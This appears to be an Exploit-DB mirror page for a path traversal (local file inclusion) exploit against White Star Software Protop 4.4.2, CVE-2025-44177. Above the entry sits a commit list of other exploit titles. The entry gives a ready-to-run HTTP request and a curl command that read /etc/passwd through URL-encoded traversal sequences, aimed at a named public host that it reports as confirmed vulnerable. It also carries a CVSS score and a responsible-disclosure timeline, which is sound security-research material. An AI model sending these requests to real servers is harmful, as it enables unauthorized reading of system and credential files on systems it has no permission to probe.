exploit-db-mirror/exploits/multiple/webapps/52367.txt
Exploit-DB 08e51ef2f9 DB: 2025-07-17
12 changes to exploits/shellcodes/ghdb

TOTOLINK N300RB 8.54 - Command Execution

MikroTik RouterOS 7.19.1 - Reflected XSS

Langflow 1.2.x - Remote Code Execution (RCE)

PivotX 3.0.0 RC3 - Remote Code Execution (RCE)

SugarCRM 14.0.0 - SSRF/Code Injection

White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)

WP Publications WordPress Plugin 1.2 - Stored XSS

NodeJS 24.x - Path Traversal

Keras 2.15 - Remote Code Execution (RCE)

Microsoft Brokering File System Windows 11 Version 22H2 - Elevation of Privilege

Microsoft Graphics Component Windows 11 Pro (Build 26100+) - Local Elevation of Privileges

Microsoft Outlook - Remote Code Execution (RCE)
2025-07-17 00:16:33 +00:00

34 lines
No EOL
1.1 KiB
Text

# Exploit Title: White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)
# Date: 2025-07-09
# Exploit Author: Imraan Khan (Lich-Sec)
# Vendor Homepage: https://wss.com/
# Software Link: https://client.protop.co.za/
# Version: v4.4.2-2024-11-27
# Tested on: Ubuntu 22.04 / Linux
# CVE: CVE-2025-44177
# CWE: CWE-22 - Path Traversal
# Description:
# A Local File Inclusion vulnerability exists in White Star Software Protop v4.4.2.
# An unauthenticated remote attacker can retrieve arbitrary files via
# URL-encoded traversal sequences in the `/pt3upd/` endpoint.
# Vulnerable Endpoint:
GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: client.protop.co.za
User-Agent: curl/8.0
Accept: */*
# Example curl command:
curl -i 'https://client.protop.co.za/pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd'
# Notes:
# - Vulnerability confirmed on public instance at time of testing.
# - CVSS v3.1 Base Score: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N)
# - The vendor was notified and a fix was issued.
# Disclosure Timeline:
# - Discovered: 2025-03-13
# - Disclosed to vendor: 2025-03-20
# - CVE Assigned: 2025-07-01
# - Public Disclosure: 2025-07-09